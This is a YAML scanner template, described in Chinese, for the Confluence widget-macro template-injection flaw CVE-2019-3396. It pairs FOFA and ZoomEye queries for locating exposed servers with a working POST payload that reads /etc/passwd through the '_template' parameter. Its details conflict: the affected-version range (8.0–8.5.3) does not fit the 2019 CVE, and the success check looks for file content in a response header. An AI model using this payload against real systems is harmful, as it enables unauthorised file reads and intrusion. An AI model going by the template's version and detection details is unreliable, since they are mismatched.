product: Atlassian-Confluence
vName: Atlassian-Confluence preview SSTI模版注入
type: 代码执行
vID:
  - CVE-2019-3396
level: 3
vDesc: Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞，该漏洞源于存在模板注入漏洞，允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
version: Atlassian Confluence 8.0 - 8.5.3
note: ''
search:
  FOFA: app="ATLASSIAN-Confluence"
  ZoomEye: app:"Atlassian Confluence"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /rest/tinymce/1/macro/preview
      json: { "contentId": "786457","macro": { "name": "widget","body": "","params": { "url": "https://www.viddler.com/v/23464dc5","width": "1000","height": "1000","_template": "file:///etc/passwd" } } }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - 'root:x:0'
            logic: and